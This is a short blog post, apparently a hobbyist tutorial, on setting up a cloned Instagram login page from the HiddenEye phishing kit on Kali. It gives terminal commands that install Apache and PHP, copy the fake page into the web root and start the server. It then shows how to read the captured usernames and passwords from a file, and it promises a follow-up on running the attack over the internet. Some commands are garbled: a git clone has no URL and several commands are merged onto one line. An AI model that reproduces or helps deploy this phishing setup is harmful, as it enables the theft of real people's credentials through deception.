Social Engineering: Step-by-Step Guide ⚡

In the context of information security, social engineering is the psychological manipulation of people into performing actions or divulging confidential information.

Step 1: Fire up Kali and install dependencies


Copy and paste these commands in your terminal.


  1. sudo apt update -y
  2. sudo apt install apache2 php git -y
  3. cd ~/Documents git clone
  4. cd HiddenEye/WebPages/Instagram_web touch usernames.txt
  5. sudo cp -r * /var/www/html
  6. sudo systemctl enable apache2 sudo systemctl start apache2



Step 2: Testing on localhost

Now head on to localhost. Now login with a random username and password. Go to your terminal and type the following command to view the captured credentials: sudo cat /var/www/html/usernames.txt


Upcoming: Running the attack over the internet.

Amateurs hack systems, professionals hack people ?

Kartik Deshmukh

2 Blog posts
